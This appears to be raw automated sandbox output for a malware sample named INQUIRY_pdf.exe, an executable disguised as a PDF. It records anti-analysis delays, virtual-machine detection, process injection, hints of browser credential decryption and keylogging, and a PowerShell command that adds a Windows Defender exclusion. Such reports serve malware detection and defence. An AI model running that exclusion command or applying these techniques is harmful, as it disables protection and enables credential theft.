Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 596156	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 596047	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 595937	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 595828	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 595719	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 595609	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 595500	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 595389	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 595281	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 595172	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 595046	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 594937	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 594828	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 594718	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 594609	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 594500	Jump to behavior

Source: INQUIRY_pdf.exe, 00000000.00000002.1701291249.0000000000E03000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}M&mS
Source: INQUIRY_pdf.exe, 00000000.00000002.1701291249.0000000000E03000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: INQUIRY_pdf.exe, 00000004.00000002.4160849539.0000000000E16000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\INQUIRY_pdf.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: 0.2.INQUIRY_pdf.exe.3ddf960.1.raw.unpack, COVID19.cs	Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
Source: 0.2.INQUIRY_pdf.exe.3ddf960.1.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
Source: 0.2.INQUIRY_pdf.exe.3ddf960.1.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text21 + "\\mozglue.dll"))

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\INQUIRY_pdf.exe"
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\INQUIRY_pdf.exe"			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\INQUIRY_pdf.exe

Memory written: C:\Users\user\Desktop\INQUIRY_pdf.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\INQUIRY_pdf.exe"			Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process created: C:\Users\user\Desktop\INQUIRY_pdf.exe "C:\Users\user\Desktop\INQUIRY_pdf.exe"			Jump to behavior

Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Users\user\Desktop\INQUIRY_pdf.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Speech\v4.0_4.0.0.0__31bf3856ad364e35\System.Speech.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
